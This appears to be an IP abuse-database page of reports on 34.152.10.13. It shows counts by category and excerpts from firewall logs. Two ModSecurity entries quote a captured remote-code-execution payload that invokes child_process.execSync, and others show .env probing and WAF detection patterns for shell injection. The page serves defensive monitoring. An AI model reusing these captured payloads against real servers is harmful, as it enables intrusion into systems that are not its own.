Log in to view charts and search reports for this IP.
Log In
Top Reporter Countries (Last 60 Days)
Example preview
Report Categories (Last 60 Days)
Example preview
Reports Activity
Example preview
Account required for the enhanced features
Log inSign up
IP Abuse Reports for 34.152.10.13:
This IP address has been reported a total of
48
times from
38 distinct
sources.
34.152.10.13 was first reported on
, and the most recent report was
.
In the last 60 days, the top reporter locations were:
Germany
with 8
reports;
France
with 7
reports;
Netherlands
with 7
reports.
The most common categories in these recent reports were:
Web App Attack
37
times;
Brute-Force
18
times;
Bad Web Bot
16
times;
Hacking
9
times;
Port Scan
3
times;
Other
5
times.
Recent Reports
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
(PERMBLOCK) 34.152.10.13 (US/United States/13.10.152.34.bc.googleusercontent.com) has had more than ...
show more(PERMBLOCK) 34.152.10.13 (US/United States/13.10.152.34.bc.googleusercontent.com) has had more than 4 temp blocks in the last 86400 secs; Ports: *; Direction: 1; Trigger: LF_PERMBLOCK_COUNT; Logs:
show less
[SatSep1223:47:55.2038632026][security2:error][pid3736985:tid3736993][client34.152.10.13:0]ModSecuri ...
show more[SatSep1223:47:55.2038632026][security2:error][pid3736985:tid3736993][client34.152.10.13:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"admin-services.ch\"][uri\"/\"][unique_id\"aqXIi6r1APOoO8pRIptqCwAAA0A\"]
show less
(mod_security) mod_security (id:949110) triggered by 34.152.10.13 (CA/Canada/13.10.152.34.bc.googleu ...
show more(mod_security) mod_security (id:949110) triggered by 34.152.10.13 (CA/Canada/13.10.152.34.bc.googleusercontent.com): N in the last X secs
show less
200 attack(s) detected, such as these: {"event":"web_block","ip":"34.152.10.13","host":"adm.mdb.big. ...
show more200 attack(s) detected, such as these: {"event":"web_block","ip":"34.152.10.13","host":"adm.mdb.big.marche-be.com","request":"GET /lib/.env HTTP/1.1","user_agent":"","reason":"Status-404","timestamp":"2026-09-12T10:49:12 00:00","logentry":"adm.mdb.big.marche-be.com 34.152.10.13 - - [12/Sep/2026:12:49:12 0200] \"GET /lib/.env HTTP/1.1\" 404 555 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36\" \"-\""} * Report Details *: https://p4u.xyz/WYRKK3KLK71/1* IP Details *: https://p4u.xyz/WYRKK3KLK71/2
show less
Detected by Cloudflare Security Events via WordPress automation. Detection: sensitive_files (Sensiti ...
show moreDetected by Cloudflare Security Events via WordPress automation. Detection: sensitive_files (Sensitive files, source control, config, and backups). Hits from same IP in last 60 minutes: 30. Unique request paths counted internally: 30. Cloudflare action: block. Cloudflare source: firewallCustom.
show less
Automated web scanning detected by Wazuh (rule 100241): repeated 400/404 errors from mass probing of ...
show moreAutomated web scanning detected by Wazuh (rule 100241): repeated 400/404 errors from mass probing of admin/backdoor paths (e.g. wp-login.php, known CMS shell filenames) on an Apache web server, on 2026-09-12 10:17 UTC.
show less
Remote Command Execution: Unix Command Injection (command without evasion). Pattern match "(?i)(?:b ...
show moreRemote Command Execution: Unix Command Injection (command without evasion). Pattern match "(?i)(?:b (932235-195)
show less
[SatSep1209:03:05.9991642026][security2:error][pid2882221:tid2882279][client34.152.10.13:0]ModSecuri ...
show more[SatSep1209:03:05.9991642026][security2:error][pid2882221:tid2882279][client34.152.10.13:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"albertiarnaldoluigi.ch\"][uri\"/\"][unique_id\"aqT5KRnqmtBJ_DdVCWd37wAAABM\"]
show less